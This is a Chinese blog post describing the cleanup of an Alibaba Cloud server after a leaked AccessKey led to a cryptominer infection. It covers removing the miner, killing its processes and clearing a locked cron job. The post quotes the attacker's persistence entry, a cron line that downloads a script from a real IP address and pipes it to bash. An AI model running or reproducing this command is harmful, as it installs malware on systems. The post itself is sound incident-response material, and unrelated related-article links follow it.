根据阿里云后台安全预警,检查到系统出现紧急预警时间:恶意脚本代码执行,预警后发现SSh无法登录(ssh服务被杀掉),服务器瘫痪,重启服务器后能正常远程。

第一件事禁用掉泄露的AK,防止二次伤害

如果不想重启服务器可以通过阿里云的后台VNC应急远程登录到服务器,执行以下命令

systemctl start sshd

netstat -anpt |grep ssh

登录服务器后top发现CPU-100%,但是进程中午占用高得资源,考虑到有隐藏进程占用了cpu

安装htop命令

yum -y install htop

使用htop命令查看隐藏的进程,发现存在这大量的挖矿应用进程,根据进程找到目录所在位置,删除掉挖矿程序,并杀掉挖矿进程

挖矿程序在:/usr/share/ddns 使用rm -rf ddns进行删除

删除挖矿进程;kill -9  进程1 进程2 进程3........

此时CPU暂时恢复正常,但是过了30秒后,CPU再次上涨,此时htop查看进程,挖矿程序再次运行,ddns挖矿病毒再次运行,考虑系统中肯定存在后门再次下载了挖矿病毒

首先考虑是存在定时任务执行

使用 crontab -l 查看系统任务调度,果然存在一个远程下载的定时任务,这是个海外的地址

*/30 * * * * curl -fsSL http://209.141.42.48/d3f815/s/cronb.sh | bash > /dev/null 2>&1

删除调度任务,编辑/var/spool/cron/root文件

vi /var/spool/cron/root

但是尝试修改root文件,将里面的定时任务删除,依旧报错

使用lsattr 命令查看被限制修改的文件,这个目录正好是crontab任务的文件,最后一层root代表的是用户名称,如果使用czw账号设置的定时任务那需要进入到czw目录下操作

这里的a代表Append Only,系统只允许在这个文件之后追加数据,不允许任何进程覆盖或截断这个文件,i 代表文件不能删除,不能更改,不能移动

因此我们需要把对应文件的-ia权限删除,使用如下指令删除,如果是-i权限,将下面指令换成-i即可

再次编辑文件,保存成功

删除掉调度任务后,再次重复上面的步骤,删除掉挖矿程序ddns,杀掉挖矿的后台进程

阿里云因Ak泄露,被攻击处理过程相关推荐

  1. 阿里云免费证书DV SSL申请过程记录

    HTTPS应用越来越普遍,为了提高安全级别,很多情况都要求使用HTTPS. 以下为个人亲测,阿里云免费证书DV SSL申请过程记录,对于想申请免费证书的小伙伴,看过可能少走一些弯路. 1.购买证书 2 ...

  2. 阿里云出现源代码泄露企业 涉及万科等40家企业200余项目

    本文来自铅笔道电子烟论坛:铅笔道 记者 | 付艳翠 编辑 | 吴晋娜 人工智能学习路线+实战训练 https://edu.csdn.net/topic/ai30?utm_source=csdn_bw ...

  3. dockerfile构建一个(python+flask+html)镜像 + 上传到阿里云私有仓库 + 部署到k8s---全过程

    前言 因为之前根据一些网上的教程一个个部分实践过整个部署流程,但都是根据现有的程序/ymal文件等进行创建部署,未能根据自己特定的项目进行部署.因此,这篇博文,打算完整部署一个自己编写的python+ ...

  4. 基于阿里云服务器ECS的建站过程

    以前个人网站一直放在新浪SAE上的,5月1号放假闲来无聊,看了下阿里云,发现学生云服务器ECS9.87元/月,1G内存,1核cpu,15G流量,40G内存.感觉阿里云的的人都是在用心在做产品呀,暖暖的 ...

  5. 记录一下我在阿里云自主申请软著的过程和体会

    以前申请软著都是淘宝让人代办,一般400元左右,31工作日下证,代办人会帮忙排版. 这次尝试阿里云自主申请,300元31个工作日,资料需要自己排版,不过挺简单的,排版规则都很明确.过程如下: 2020 ...

  6. 解决阿里云服务器被植入挖矿脚本过程

    文章目录 前言 一.服务器为什么会被告警挖矿? 二.怎么解决: 1.top 命令查看进程cpu 占用情况: 2.通过pid进程号,查找改程序所在的目录: 3. 强制删除脚本文件: 4. 强制杀死进程: ...

  7. 阿里云系列——7.阿里云IIS系列详解(过程+通用+最新)

    网站部署之~阿里云系列汇总 http://www.cnblogs.com/dunitian/p/4958462.html 先讲IIS系列,Linux部署以后再继续讲 先打开主机管理平台,确认域名绑定 ...

  8. 阿里linux安装mysql_阿里云Linux Ubuntu系统安装mysql完整过程

    1.下载mysql包 2.tar解压 [root@localhost /]#tar xzvf mysql-5.7.24-linux-glibc2.12-x86_64.tar.gz 3.移动到/usr/ ...

  9. python-django 阿里云ECS服务器部署uwsgi+nginx过程解说

    需求:在本地已经完成了一个博客系统/数据可视化系统的开发,需要部署到系统上,展示个人主页/个人作品 编程语言:Python 系统框架:Django 数据库:MySQL 服务架构:uwsgi+nginx ...

最新文章

  1. CVPR2021最新接收论文合集!22个方向100+篇论文汇总
  2. 用 Python 实现隐身,我可以
  3. Linux与JVM的内存关系分析
  4. 泽西岛/贾克斯RS:流式JSON
  5. 详解mysql什么时候不走索引
  6. [Liunx]Linux安装screenfetch
  7. 适合初学者的安卓开源项目_开源世界中初学者的颠簸之旅
  8. C#经典系列-键值对
  9. linux之openssh配置
  10. c语言怎么运行出星星,C语言打印星星的问题
  11. 用c语言实现数据结构算法将两个有序链表并为一个有序链表的算法,,(完整版)数据结构-习题集答案-(C语言版严蔚敏)...
  12. 笔记︱金融风险之欺诈分类以及银行防控体系简述
  13. IMU预积分推导——公式准备
  14. 中国39所985高校省级行政区分布-web数据可视化(d3.pack包含关系图)
  15. html删除学生数据,对学生信息进行删除网页html代码.doc
  16. ios12微信H5输入框软键盘关闭后,页面无法回到正常位置
  17. Hadoop-2.7.1+Zookeeper-3.4.8+HBase-1.2.1+Hive-2.0.0完全分布式集群
  18. 坚持与展望——科泰华捷董事长陈榕专访
  19. FHQ_TREAP学习笔记
  20. 交换机ARP代理详解

热门文章

  1. Servlet - 九大对象和四个作用域
  2. “第二届中国软件杯”比赛
  3. Java-方法语句-员工迟到处理
  4. c语言中lseek函数,lseek函数解决方法
  5. 几分钟搞懂Vuex(State,Mutations,Actions)
  6. layuimini后台管理系统的简单使用
  7. Bug 和什么最像?| 每日趣闻
  8. 百思不得姐框架(一)
  9. 计算机设置桌面文件夹,如何在自己的电脑桌面文件夹上设置密码
  10. 做开发几年的个人经历